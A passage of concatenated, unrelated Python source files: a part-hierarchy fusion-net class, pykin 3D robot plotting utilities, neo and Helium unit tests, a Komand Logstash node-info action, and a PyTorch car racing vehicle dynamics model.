self.nodes["bg_clothes"] = SFNode("bg_clothes", child1=self.nodes["clothes"], child2=self.nodes["bg"])
self.nodes["bg_hair_clothes"] = SFNode("bg_hair_clothes",
child1=self.nodes["bg_clothes"], child2=self.nodes["hair"])
self.nodes["all"] = SFNode("all", child1=self.nodes["face"], child2=self.nodes["bg_hair_clothes"])
class SFHierarchyCar:
def __init__(self):
self.nodes = dict()
self.nodes["wheels"] = SFNode("wheels")
self.nodes["car_body"] = SFNode("car_body")
self.nodes["background_top"] = SFNode("background_top")
self.nodes["background_bottom"] = SFNode("background_bottom")
self.nodes["car"] = SFNode("car", child1=self.nodes["car_body"], child2=self.nodes["wheels"])
self.nodes["background"] = SFNode("background",
child1=self.nodes["background_top"], child2=self.nodes["background_bottom"])
self.nodes["all"] = SFNode("all", child1=self.nodes["car"], child2=self.nodes["background"])
class SFHierarchyChurch:
def __init__(self=None):
self.nodes = dict()
self.nodes["church"] = SFNode("church")
self.nodes["background"] = SFNode("background")
self.nodes["all"] = SFNode("all", child1=self.nodes["church"], child2=self.nodes["background"])
class SFNode:
def __init__(self, name, child1=None, child2=None):
self.name = name
self.child1 = child1
self.child2 = child2
self.fusion_net = None
if child1 is None or child2 is None:
assert child1 is None and child2 is None
self._leaf = True
else:
self._leaf = False
def get_all_parts(self):
if self._leaf:
return [self.name]
else:
return [self.name] + self.child1.get_all_parts() + self.child2.get_all_parts()
def get_all_active_parts(self):
if self.fusion_net is None:
return [self.name]
else:
return [self.name] + self.child1.get_all_active_parts() + self.child2.get_all_active_parts()
def get_fusion_nets_amount(self):
if self.fusion_net is None:
return 0
if self._leaf:
return 1
else:
return 1 + self.child1.get_fusion_nets_amount() + self.child2.get_fusion_nets_amount()
def get_fusion_nets(self):
if self.fusion_net is None:
return []
if self._leaf:
return [self.fusion_net]
else:
return [self.fusion_net] + self.child1.get_fusion_nets() + self.child2.get_fusion_nets()
def forward(self, s_dict):
if self.fusion_net is None:
return s_dict[self.name]
if not (self.child1.name in s_dict.keys() and self.child2.name in s_dict.keys()):
return s_dict[self.name]
return self.fusion_net(
self.child1.forward(s_dict),
self.child2.forward(s_dict),
s_dict[self.name])
def load_fusion_net(self, path):
data = torch.load(path)
self.fusion_net = FusionNet()
if "state_dict" in data.keys():
data = data["state_dict"]
self.fusion_net.load_state_dict(data)
|
499092
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
from pykin.utils import transform_utils as tf
# Colors of each directions axes. For ex X is green
directions_colors = ["green", "cyan", "orange"]
def init_3d_figure(name=None, figsize=(15,7.5), dpi= 80):
"""
Initializes 3d figure
"""
fig = plt.figure(name, figsize=figsize, dpi= dpi)
ax = fig.add_subplot(111, projection='3d')
return fig, ax
def show_figure():
"""
Show figure
"""
plt.show()
def _check_color_type(color):
"""
Check color's data type
"""
if isinstance(color, str):
color = color
if isinstance(color, list):
if len(color) == 0:
color = 'k'
else:
color = color[0]
if isinstance(color, np.ndarray):
if len(color) == 0:
color = np.array([0.2, 0.2, 0.2, 1.])
else:
color = color
if isinstance(color, dict):
if len(color) == 0:
color = np.array([0.2, 0.2, 0.2, 1.])
else:
color = list(color.values())[0]
return color
def plot_basis(robot=None, ax=None):
"""
Plot a frame fitted to the robot size
"""
if robot is not None:
offset = np.linalg.norm(robot.offset.pos)
else:
offset = 1
if offset == 0:
offset = 1
ax.set_xlim3d([-1.0 * offset, 1.0 * offset])
ax.set_xlabel('X')
ax.set_ylim3d([-1.0 * offset, 1.0 * offset])
ax.set_ylabel('Y')
ax.set_zlim3d([-1.0 * offset, 1.0 * offset])
ax.set_zlabel('Z')
ax.plot([0, offset * 1.5], [0, 0], [0, 0],
c=directions_colors[0], label="X")
ax.plot([0, 0], [0, offset * 1.5], [0, 0],
c=directions_colors[1], label="Y")
ax.plot([0, 0], [0, 0], [0, offset * 1.5],
c=directions_colors[2], label="Z")
def plot_robot(
robot,
ax=None,
transformations=None,
visible_collision=False,
visible_text=True,
visible_scatter=True,
visible_basis=True):
"""
Plot robot
"""
if transformations is None:
transformations = robot.init_transformations
name = robot.robot_name
if visible_basis:
plot_basis(robot, ax)
links = []
nodes = []
transformation_matrix = []
for i, (link, transformation) in enumerate(transformations.items()):
links.append(link)
transformation_matrix.append(transformation.h_mat)
eef_idx = 0
for i, (link, matrix) in enumerate(zip(links, transformation_matrix)):
nodes.append(tf.get_pos_mat_from_homogeneous(matrix))
if link == robot.eef_name:
eef_idx=i
if name == "baxter":
plot_baxter(nodes, ax, visible_text, visible_scatter)
else:
lines = ax.plot([x[0] for x in nodes], [x[1] for x in nodes], [
x[2] for x in nodes], linewidth=2, label=name)
if visible_text:
label = '(%0.4f, %0.4f, %0.4f)' % (
nodes[eef_idx][0], nodes[eef_idx][1], nodes[eef_idx][2])
ax.text(nodes[eef_idx][0], nodes[eef_idx][1],
nodes[eef_idx][2], label, size="8")
if visible_scatter:
ax.scatter([x[0] for x in nodes], [x[1] for x in nodes],
[x[2] for x in nodes], s=20, c=lines[0].get_color())
if visible_collision:
plot_collision(robot, transformations, ax)
ax.legend()
def plot_baxter(nodes, ax, visible_text=True, visible_scatter=True):
"""
Plot baxter robot
"""
torso_nodes = [nodes[0]] + [nodes[3]]
head_nodes = torso_nodes + nodes[7:12]
pedestal_nodes = torso_nodes + [nodes[6]]
right_nodes = torso_nodes + nodes[13:18] + nodes[20:29]
left_nodes = torso_nodes + nodes[31:36] + nodes[38:47]
head_lines = ax.plot([x[0] for x in head_nodes], [x[1] for x in head_nodes], [
x[2] for x in head_nodes], linewidth=5, label="head")
pedestal_lines = ax.plot([x[0] for x in pedestal_nodes], [x[1] for x in pedestal_nodes], [
x[2] for x in pedestal_nodes], linewidth=5, label="pedestal")
right_lines = ax.plot([x[0] for x in right_nodes], [x[1] for x in right_nodes], [
x[2] for x in right_nodes], linewidth=5, label="right arm")
left_lines = ax.plot([x[0] for x in left_nodes], [x[1] for x in left_nodes], [
x[2] for x in left_nodes], linewidth=5, label="left arm")
if visible_text:
head_label = '(%0.4f, %0.4f, %0.4f)' % (
head_nodes[-1][0], head_nodes[-1][1], head_nodes[-1][2])
pedestal_label = '(%0.4f, %0.4f, %0.4f)' % (
pedestal_nodes[-1][0], pedestal_nodes[-1][1], pedestal_nodes[-1][2])
right_label = '(%0.4f, %0.4f, %0.4f)' % (
right_nodes[8][0], right_nodes[8][1], right_nodes[8][2])
left_label = '(%0.4f, %0.4f, %0.4f)' % (
left_nodes[8][0], left_nodes[8][1], left_nodes[8][2])
ax.text(head_nodes[-1][0], head_nodes[-1][1],
head_nodes[-1][2], head_label, size="8")
ax.text(pedestal_nodes[-1][0], pedestal_nodes[-1][1],
pedestal_nodes[-1][2], pedestal_label, size="8")
ax.text(right_nodes[-1][0], right_nodes[-1][1],
right_nodes[-1][2], right_label, size="8")
ax.text(left_nodes[-1][0], left_nodes[-1][1],
left_nodes[-1][2], left_label, size="8")
if visible_scatter:
ax.scatter([x[0] for x in head_nodes], [x[1] for x in head_nodes],
[x[2] for x in head_nodes], s=30, c=head_lines[0].get_color())
ax.scatter([x[0] for x in pedestal_nodes], [x[1] for x in pedestal_nodes],
[x[2] for x in pedestal_nodes], s=30, c=pedestal_lines[0].get_color())
ax.scatter([x[0] for x in right_nodes], [x[1] for x in right_nodes],
[x[2] for x in right_nodes], s=30, c=right_lines[0].get_color())
ax.scatter([x[0] for x in left_nodes], [x[1] for x in left_nodes],
[x[2] for x in left_nodes], s=30, c=left_lines[0].get_color())
def plot_trajectories(ax, path, size=10, color='r'):
"""
Plot plot_trajectories
"""
ax.scatter([x for (x, y, z) in path], [y for (x, y, z) in path], [z for (x, y, z) in path], s=size, c=color)
def plot_animation(
robot,
trajectory,
fig=None,
ax=None,
eef_poses=None,
objects=None,
visible_objects=False,
visible_collision=False,
visible_text=True,
visible_scatter=True,
interval=100,
repeat=False
):
"""
Plot animation
"""
def update(i):
# print(f"{i/len(trajectory) * 100:.1f} %")
if i == len(trajectory)-1:
# print(f"{i/(len(trajectory)-1) * 100:.1f} %")
print("Animation Finished..")
ax.clear()
if visible_objects and objects:
plot_objects(ax, objects)
if eef_poses is not None:
plot_trajectories(ax, eef_poses)
plot_robot(
robot,
transformations=trajectory[i],
ax=ax,
visible_collision=visible_collision,
visible_text=visible_text,
visible_scatter=visible_scatter)
ani = animation.FuncAnimation(fig, update, np.arange(len(trajectory)), interval=interval, repeat=repeat)
plt.show()
def plot_objects(ax, objects):
"""
Plot objects
"""
for key, value in objects:
o_type = value[0]
o_param = value[1]
o_pose = value[2]
if o_type == "mesh":
plot_mesh(ax, mesh=o_param, A2B=o_pose, alpha=0.3)
if o_type == "sphere":
plot_sphere(ax, radius=o_param, p=o_pose, alpha=0.8, color='g')
if o_type == "box":
A2B = tf.get_h_mat(o_pose)
plot_box(ax, size=o_param, A2B=A2B, alpha=0.8, color='b')
if o_type == "cylinder":
A2B = tf.get_h_mat(o_pose)
plot_cylinder(ax, radius=o_param[0], length=o_param[1], A2B=A2B, n_steps=100, alpha=0.8, color='r')
def plot_collision(robot, transformations, ax, alpha=0.8):
"""
Plot robot's collision
"""
def _get_color(params):
color = []
if params is not None:
visual_color = params.get('color')
if visual_color is not None:
color = list(visual_color.keys())
return color
for link, transformation in transformations.items():
A2B = np.dot(transformation.h_mat, robot.links[link].collision.offset.h_mat)
color = _get_color(robot.links[link].visual.gparam)
if robot.links[link].collision.gtype == 'cylinder':
length = float(robot.links[link].collision.gparam.get('length'))
radius = float(robot.links[link].collision.gparam.get('radius'))
plot_cylinder(ax, length=length, radius=radius, A2B=A2B, alpha=alpha, color=color)
if robot.links[link].collision.gtype == 'sphere':
radius = float(robot.links[link].collision.gparam.get('radius'))
pos = A2B[:3,-1]
plot_sphere(ax, radius=radius, p=pos, n_steps=20, alpha=alpha, color=color)
if robot.links[link].collision.gtype == 'box':
size = robot.links[link].collision.gparam.get('size')
plot_box(ax, size, A2B=A2B, alpha=alpha, color=color)
def plot_cylinder(ax=None, length=1.0, radius=1.0,
A2B=np.eye(4), n_steps=100,
alpha=1.0, color="k"):
"""
Plot cylinder
"""
color = _check_color_type(color)
axis_start = A2B.dot(np.array([0, 0, -length/2, 1]))[:3]
axis_end = A2B.dot(np.array([0, 0, length/2, 1]))[:3]
axis = axis_end - axis_start
axis /= length
not_axis = np.array([1, 0, 0])
if (axis == not_axis).all():
not_axis = np.array([0, 1, 0])
n1 = np.cross(axis, not_axis)
n1 /= np.linalg.norm(n1)
n2 = np.cross(axis, n1)
t = np.array([0, length])
theta = np.linspace(0, 2 * np.pi, n_steps)
t, theta = np.meshgrid(t, theta)
X, Y, Z = [axis_start[i] + axis[i] * t
+ radius * np.sin(theta) * n1[i]
+ radius * np.cos(theta) * n2[i] for i in [0, 1, 2]]
ax.plot_surface(X, Y, Z, color=color, alpha=alpha, linewidth=0)
def plot_sphere(ax=None, radius=1.0, p=np.zeros(3), n_steps=20, alpha=1.0, color="k"):
"""
Plot sphere
"""
color = _check_color_type(color)
phi, theta = np.mgrid[0.0:np.pi:n_steps * 1j, 0.0:2.0 * np.pi:n_steps * 1j]
x = p[0] + radius * np.sin(phi) * np.cos(theta)
y = p[1] + radius * np.sin(phi) * np.sin(theta)
z = p[2] + radius * np.cos(phi)
ax.plot_surface(x, y, z, color=color, alpha=alpha, linewidth=0)
def plot_box(ax=None, size=np.ones(3), alpha=1.0, A2B=np.eye(4), color="k"):
"""
Plot box
"""
color = _check_color_type(color)
if not isinstance(size, np.ndarray):
size = np.array(size)
corners = np.array([
[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0],
[1, 1, 1]
])
corners = (corners - 0.5) * size
PA = np.hstack(
(corners, np.ones((len(corners), 1))))
corners = np.dot(PA, A2B.T)[:, :3]
p3c = Poly3DCollection(np.array([
[corners[0], corners[1], corners[2]],
[corners[1], corners[2], corners[3]],
[corners[4], corners[5], corners[6]],
[corners[5], corners[6], corners[7]],
[corners[0], corners[1], corners[4]],
[corners[1], corners[4], corners[5]],
[corners[2], corners[6], corners[7]],
[corners[2], corners[3], corners[7]],
[corners[0], corners[4], corners[6]],
[corners[0], corners[2], corners[6]],
[corners[1], corners[5], corners[7]],
[corners[1], corners[3], corners[7]],
]))
p3c.set_alpha(alpha)
p3c.set_facecolor(color)
ax.add_collection3d(p3c)
def plot_path_planner(path, ax):
"""
Plot rrt* path planner
"""
if path is None:
print("cannot create path")
return
ax.scatter([x for (x, y, z) in path], [y for (x, y, z) in path], [z for (x, y, z) in path], s=10, c='r')
ax.plot([x for (x, y, z) in path], [y for (x, y, z) in path], [z for (x, y, z) in path], '-b', linewidth=0.5,)
ax.text(path[0][0], path[0][1], path[0][2], 'Start', verticalalignment='bottom', horizontalalignment='center', size="20")
ax.text(path[-1][0], path[-1][1], path[-1][2],'Goal', verticalalignment='bottom', horizontalalignment='center', size="20")
def plot_mesh(ax=None, mesh=None, A2B=np.eye(4),
s=np.array([1.0, 1.0, 1.0]), ax_s=1, wireframe=False,
convex_hull=False, alpha=1.0, color="k"):
vertices = mesh.vertices * s
vertices = np.hstack((vertices, np.ones((len(vertices), 1))))
vertices = np.dot(vertices, A2B.T)[:, :3]
vectors = np.array([vertices[[i, j, k]] for i, j, k in mesh.faces])
surface = Poly3DCollection(vectors)
surface.set_facecolor(color)
surface.set_alpha(alpha)
ax.add_collection3d(surface)
def plot_normal_vector(ax, vertices, normals, scale=1, linewidths=(1,), edgecolor="red"):
if vertices.ndim != 2:
vertices = vertices.reshape(1, -1)
if normals.ndim != 2:
normals = normals.reshape(1, -1)
ax.quiver(
[vertex[0] for vertex in vertices],
[vertex[1] for vertex in vertices],
[vertex[2] for vertex in vertices],
[normal[0]*scale for normal in normals],
[normal[1]*scale for normal in normals],
[normal[2]*scale for normal in normals], linewidths=linewidths, edgecolor=edgecolor)
def plot_axis(
ax,
pose,
axis=[1, 1, 1],
scale=0.1
):
if axis[0]:
plot_normal_vector(ax, pose[:3, 3], pose[:3, 0], scale=scale, edgecolor="red")
if axis[1]:
plot_normal_vector(ax, pose[:3, 3], pose[:3, 1], scale=scale, edgecolor="green")
if axis[2]:
plot_normal_vector(ax, pose[:3, 3], pose[:3, 2], scale=scale, edgecolor="blue")
def plot_vertices(ax, vertices, s=5, c='k'):
if vertices.ndim != 2:
vertices = vertices.reshape(1, -1)
ax.scatter([x[0] for x in vertices], [x[1] for x in vertices],
[x[2] for x in vertices], s=s, c=c)
def plot_line(ax, vertices, linewidth=1):
if vertices.ndim != 2:
vertices = vertices.reshape(1, -1)
ax.plot(
[x[0] for x in vertices],
[x[1] for x in vertices],
[x[2] for x in vertices], linewidth=linewidth)
|
499100
|
import unittest
from neo.rawio.elanrawio import ElanRawIO
from neo.test.rawiotest.common_rawio_test import BaseTestRawIO
class TestElanRawIO(BaseTestRawIO, unittest.TestCase, ):
rawioclass = ElanRawIO
entities_to_test = [
'elan/File_elan_1.eeg'
]
entities_to_download = [
'elan',
]
if __name__ == "__main__":
unittest.main()
|
499153
|
import datetime
from django.test import TestCase
from django.utils import timezone
from helium.auth.tests.helpers import userhelper
from helium.planner.models import Reminder
from helium.planner.tests.helpers import coursegrouphelper, coursehelper, homeworkhelper, eventhelper, reminderhelper
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, Helium Edu"
__version__ = "1.4.38"
class TestCaseReminder(TestCase):
def test_parent_change_triggers_reminder_update(self):
# GIVEN
user = userhelper.given_a_user_exists()
event = eventhelper.given_event_exists(user)
course_group = coursegrouphelper.given_course_group_exists(user)
course = coursehelper.given_course_exists(course_group)
homework = homeworkhelper.given_homework_exists(course)
reminder1 = reminderhelper.given_reminder_exists(user, event=event)
reminder2 = reminderhelper.given_reminder_exists(user, homework=homework)
# WHEN
event.start = datetime.datetime(2019, 5, 8, 12, 0, 0, tzinfo=timezone.utc)
event.save()
homework.start = datetime.datetime(2019, 1, 8, 10, 0, 0, tzinfo=timezone.utc)
homework.save()
# THEN
reminder1 = Reminder.objects.get(pk=reminder1.id)
reminder2 = Reminder.objects.get(pk=reminder2.id)
self.assertEqual(reminder1.start_of_range, datetime.datetime(2019, 5, 8, 11, 45, 0, tzinfo=timezone.utc))
self.assertEqual(reminder2.start_of_range, datetime.datetime(2019, 1, 8, 9, 45, 0, tzinfo=timezone.utc))
|
499163
|
import komand
from .schema import NodeInput, NodeOutput
# Custom imports below
from urllib.parse import urljoin
from komand_logstash.util import utils
import requests
class Node(komand.Action):
TYPES = ["pipeline", "os", "jvm"]
def __init__(self):
super(self.__class__, self).__init__(
name="node",
description="Retrieves information about the node",
input=NodeInput(),
output=NodeOutput(),
)
def run(self, params={}):
url = urljoin(self.connection.url, "/_node")
types = params.get("types")
if types:
error_types = utils.check_types(self.TYPES, types)
if error_types:
self.logger.error("Logstash: Node Info: invalid types %s", ",".join(error_types))
raise Exception("Logstash: Node: Invalid types", types)
r = requests.get(url, params=params)
return {"response": utils.serialize(r.json())}
def test(self):
url = urljoin(self.connection.url, "_node")
r = requests.get(url)
if r.status_code != 200:
raise Exception("%s (HTTP status: %s)" % (r.text, r.status_code))
return {"status_code": r.status_code}
|
499194
|
import torch
import car_racing_simulator.Track as Track
import numpy as np
import copy
class VehicleModel():
def __init__(self,n_batch,device,config):
self.device = device
self.track = Track.Track(config)
self.track_s = torch.from_numpy(self.track.s).type(torch.FloatTensor).to(self.device)
self.track_kappa = torch.from_numpy(self.track.kappa).type(torch.FloatTensor).to(self.device)
self.track_phi = torch.from_numpy(self.track.phi).type(torch.FloatTensor).to(self.device)
self.track_X = torch.from_numpy(self.track.X).type(torch.FloatTensor).to(self.device)
self.track_Y = torch.from_numpy(self.track.Y).type(torch.FloatTensor).to(self.device)
self.track_d_upper = torch.from_numpy(self.track.d_upper).type(torch.FloatTensor).to(self.device)
self.track_d_lower = torch.from_numpy(self.track.d_lower).type(torch.FloatTensor).to(self.device)
self.track_angle_upper = torch.from_numpy(self.track.border_angle_upper).type(torch.FloatTensor).to(self.device)
self.track_angle_lower = torch.from_numpy(self.track.border_angle_lower).type(torch.FloatTensor).to(self.device)
self.n_full_state = config['n_state']
self.n_control = config["n_control"]
self.n_batch = n_batch
# Model Parameters
self.Cm1 = 0.287
self.Cm2 = 0.054527
self.Cr0 = 0.051891
self.Cr2 = 0.000348
self.B_r = 3.3852 / 1.2
self.C_r = 1.2691
self.D_r = 1. * 0.1737 * 1.2
self.B_f = 2.579
self.C_f = 1.2
self.D_f = 1.05 * .192
self.mass = 0.041
self.mass_long = 0.041
self.I_z = 27.8e-6
self.l_f = 0.029
self.l_r = 0.033
self.L = 0.06
self.W = 0.03
self.tv_p = 0
self.Ts = 0.03
def dynModel(self, x, u):
k1 = self.dx(x, u)
k2 = self.dx(x + self.Ts / 2. * k1, u)
k3 = self.dx(x + self.Ts / 2. * k2, u)
k4 = self.dx(x + self.Ts * k3, u)
x_next = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.)
return x_next
def dx(self, x, u):
f = torch.empty(self.n_batch, self.n_full_state,device=self.device)
phi = x[:, 2]
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5]
delta = u[:, 1]
r_tar = delta * v_x / (self.l_f + self.l_r)
[F_rx, F_ry, F_fy] = self.forceModel(x, u)
f[:, 0] = v_x * torch.cos(phi) - v_y * torch.sin(phi)
f[:, 1] = v_x * torch.sin(phi) + v_y * torch.cos(phi)
f[:, 2] = r
f[:, 3] = 1 / self.mass_long * (F_rx - F_fy * torch.sin(delta) + self.mass * v_y * r)
f[:, 4] = 1 / self.mass * (F_ry + F_fy * torch.cos(delta) - self.mass * v_x * r)
f[:, 5] = 1 / self.I_z * (F_fy * self.l_f * torch.cos(delta) - F_ry * self.l_r + self.tv_p * (r_tar - r))
return f
def slipAngle(self, x, u):
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5]
delta = u[:, 1]
alpha_f = -torch.atan((self.l_f * r + v_y) / (v_x+1e-5)) + delta
alpha_r = torch.atan((self.l_r * r - v_y) / (v_x+1e-5))
return alpha_f, alpha_r
def forceModel(self, x, u):
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5]
D = u[:, 0]
delta = u[:, 1]
alpha_f = -torch.atan((self.l_f * r + v_y) / (v_x+1e-5)) + delta
alpha_r = torch.atan((self.l_r * r - v_y) / (v_x+1e-5))
F_rx = self.Cm1 * D - self.Cm2*v_x*D - self.Cr2*v_x**2 - self.Cr0
F_ry = self.D_r * torch.sin(self.C_r * torch.atan(self.B_r * alpha_r))
F_fy = self.D_f * torch.sin(self.C_f * torch.atan(self.B_f * alpha_f))
return F_rx, F_ry, F_fy
def compLocalCoordinates(self, x):
x_local = torch.zeros(self.n_batch,7)
dist = torch.zeros(self.n_batch,self.track.N)
for i in range(self.track.N):
dist[:,i] = (x[:,0] - self.track_X[i])**2 + (x[:,1] - self.track_Y[i])**2
min_index = torch.argmin(dist, dim=1)
# min_dist = torch.sqrt(dist[:,min_index])
# if min_dist > 0.4:
# print(min_index)
for i in range(self.n_batch):
# print(min_index[i])
if dist[i,min_index[i]] <= 1e-13:
s = self.track_s[min_index[i]]
d = 0
mu = x[2] - self.track_phi[min_index[i]]
kappa = self.track_kappa[min_index[i]]
x_local[i, :] = torch.tensor([s, d, mu, x[i, 3], x[i, 4], x[i, 5], kappa])
else:
a = torch.zeros(2)
b = torch.zeros(2)
a[0] = x[i, 0] - self.track_X[min_index[i]]
a[1] = x[i, 1] - self.track_Y[min_index[i]]
b[0] = self.track_X[min_index[i]+1] - self.track_X[min_index[i]]
b[1] = self.track_Y[min_index[i]+1] - self.track_Y[min_index[i]]
# a = self.vecToPoint(min_index, x)
# b = self.vecTrack(min_index)a
cos_theta = (torch.dot(a, b) / (torch.norm(a) * torch.norm(b)))
# print("cos(theta): ",cos_theta)
if cos_theta < 0:
min_index[i] = min_index[i] - 1
if min_index[i] < 0:
min_index[i] = self.track.N - 1
a[0] = x[i, 0] - self.track_X[min_index[i]]
a[1] = x[i, 1] - self.track_Y[min_index[i]]
b[0] = self.track_X[min_index[i] + 1] - self.track_X[min_index[i]]
b[1] = self.track_Y[min_index[i] + 1] - self.track_Y[min_index[i]]
cos_theta = (torch.dot(a, b) / (torch.norm(a) * torch.norm(b)))
# print("cos(theta): ",cos_theta)
if cos_theta >= 1:
cos_theta = torch.tensor(0.9999999)
rela_proj = torch.norm(a) * cos_theta / torch.norm(b)
# print("realtive projection: ",rela_proj)
rela_proj = max(min(rela_proj, 1), 0)
# print("realtive projection: ",rela_proj)
theta = torch.acos(cos_theta)
error_sign = -torch.sign(a[0] * b[1] - a[1] * b[0])
error = error_sign * torch.norm(a) * torch.sin(theta)
if error != error:
error = 0.0
# print(min_index[i])
next_min_index = min_index[i] + 1
if next_min_index > self.track.N:
next_min_index = 0
s = self.track_s[min_index[i]] + (rela_proj * (-self.track_s[min_index[i]] + self.track_s[next_min_index]))
d = error
mu = self.wrapMu(x[i,2] - (self.track_phi[min_index[i]] + (rela_proj * (-self.track_phi[min_index[i]] + self.track_phi[next_min_index]))))
kappa = self.track_kappa[min_index[i]] + (rela_proj * (-self.track_kappa[min_index[i]] + self.track_kappa[next_min_index]))
if s!=s:
print(s)
x_local[i,:] = torch.tensor([s, d, mu, x[i,3], x[i,4], x[i,5], kappa])
return x_local
def dynModelCurve(self, x, u):
k1 = self.dxCurve(x, u).to(self.device)
k2 = self.dxCurve(x + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxCurve(x + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxCurve(x + self.Ts * k3, u).to(self.device)
x_next = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
return x_next
def dynModelBlend(self, x, u):
blend_ratio = (x[:,3] - 0.3)/(0.2)
lambda_blend = np.min([np.max([blend_ratio,0]),1])
# blend_max = torch.max(torch.cat([blend_ratio.view(-1,1), torch.zeros(blend_ratio.size(0),1)],dim=1),dim=1)
# blend_min = torch.min(torch.cat([blend_max.values.view(-1, 1), torch.ones(blend_max.values.size(0), 1)], dim=1), dim=1)
# lambda_blend = blend_min.values
if lambda_blend <1:
v_x = x[:,3]
v_y = x[:, 4]
x_kin = torch.cat([x[:,0:3], torch.sqrt(v_x*v_x + v_y*v_y).reshape(-1,1)],dim =1)
k1 = self.dxkin(x_kin, u).to(self.device)
k2 = self.dxkin(x_kin + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxkin(x_kin + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxkin(x_kin + self.Ts * k3, u).to(self.device)
x_kin_state = x_kin + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
delta = u[:, 1]
beta = torch.atan(self.l_r * torch.tan(delta) / (self.l_f + self.l_r))
v_x_state = x_kin_state[:,3] * torch.cos(beta) # V*cos(beta)
v_y_state = x_kin_state[:,3] * torch.sin(beta) # V*sin(beta)
yawrate_state = v_x_state * torch.tan(delta)/(self.l_f + self.l_r)
x_kin_full = torch.cat([x_kin_state[:,0:3],v_x_state.view(-1,1),v_y_state.view(-1,1), yawrate_state.view(-1,1)],dim =1)
if lambda_blend ==0:
return x_kin_full
if lambda_blend >0:
k1 = self.dxCurve(x, u).to(self.device)
k2 = self.dxCurve(x + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxCurve(x + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxCurve(x + self.Ts * k3, u).to(self.device)
x_dyn = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
if lambda_blend ==1:
return x_dyn
return x_dyn*lambda_blend + (1-lambda_blend)*x_kin_full
def dynModelBlendBatch(self, x, u_unclipped):
blend_ratio = (x[:,3] - 0.3)/(0.2)
# lambda_blend = np.min([np.max([blend_ratio,0]),1])
blend_max = torch.max(torch.cat([blend_ratio.view(-1,1), torch.zeros(blend_ratio.size(0),1)],dim=1),dim=1)
blend_min = torch.min(torch.cat([blend_max.values.view(-1, 1), torch.ones(blend_max.values.size(0), 1)], dim=1), dim=1)
lambda_blend = blend_min.values
# print(lambda_blend)
u = u_unclipped
# u[:,0] = torch.clamp(u_unclipped[:,0],-0.2,1) #
# u[:,1] = torch.clamp(u_unclipped[:,1],-0.35,0.35) # steering angle
u[:,0] = torch.clamp(u_unclipped[:,0],-1,1) #
u[:,1] = torch.clamp(u_unclipped[:,1],-1,1) # steering angle
# u[:, 0] = u[:, 0]*1.2/2 + 0.4 #(-0.2,1)
# u[:, 1] = u[:, 1] * 0.35 #(-0.35,035)
v_x = x[:,3]
v_y = x[:, 4]
x_kin = torch.cat([x[:,0:3], torch.sqrt(v_x*v_x + v_y*v_y).reshape(-1,1)],dim =1)
k1 = self.dxkin(x_kin, u).to(self.device)
k2 = self.dxkin(x_kin + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxkin(x_kin + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxkin(x_kin + self.Ts * k3, u).to(self.device)
x_kin_state = x_kin + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
delta = u[:, 1]
beta = torch.atan(self.l_r * torch.tan(delta) / (self.l_f + self.l_r))
v_x_state = x_kin_state[:,3] * torch.cos(beta) # V*cos(beta)
v_y_state = x_kin_state[:,3] * torch.sin(beta) # V*sin(beta)
yawrate_state = v_x_state * torch.tan(delta)/(self.l_f + self.l_r)
x_kin_full = torch.cat([x_kin_state[:,0:3],v_x_state.view(-1,1),v_y_state.view(-1,1), yawrate_state.view(-1,1)],dim =1)
k1 = self.dxCurve(x, u).to(self.device)
k2 = self.dxCurve(x + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxCurve(x + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxCurve(x + self.Ts * k3, u).to(self.device)
x_dyn = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
return (x_dyn.transpose(0,1)*lambda_blend + x_kin_full.transpose(0,1)*(1-lambda_blend)).transpose(0,1)
def dxkin(self, x, u):
fkin = torch.empty(x.size(0), 4)
s = x[:,0] #progress
d = x[:,1] #horizontal displacement
mu = x[:, 2] #orientation
v = x[:, 3]
delta = u[:, 1]
kappa = self.getCurvature(s)
beta = torch.atan(self.l_r*torch.tan(delta)/(self.l_f + self.l_r))
fkin[:, 0] = (v*torch.cos(beta + mu))/(1.0 - kappa*d) # s_dot
fkin[:, 1] = v*torch.sin(beta + mu) # d_dot
fkin[:, 2] = v*torch.sin(beta)/self.l_r - kappa*(v*torch.cos(beta + mu))/(1.0 - kappa*d)
slow_ind = v<=0.1
D_0 = (self.Cr0 + self.Cr2*v*v)/(self.Cm1 - self.Cm2 * v)
D_slow = torch.max(D_0,u[:,0])
D_fast = u[:,0]
D = D_slow*slow_ind + D_fast*(~slow_ind)
fkin[:, 3] = 1 / self.mass_long * (self.Cm1 * D - self.Cm2 * v * D - self.Cr0 - self.Cr2*v*v)
return fkin
def dxCurve_blend(self, x, u):
f = torch.empty(self.n_batch, self.n_full_state)
s = x[:,0] #progress
d = x[:,1] #horizontal displacement
mu = x[:, 2] #orientation
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5] #yawrate
delta = u[:, 1]
r_tar = delta * v_x / (self.l_f + self.l_r)
blend_ratio = (v_x - 0.3)/(0.2)
lambda_blend = np.min([np.max([blend_ratio,0]),1])
kappa = self.getCurvature(s)
if lambda_blend<1:
fkin = torch.empty(self.n_batch, self.n_full_state)
v = np.sqrt(v_x*v_x + v_y*v_y)
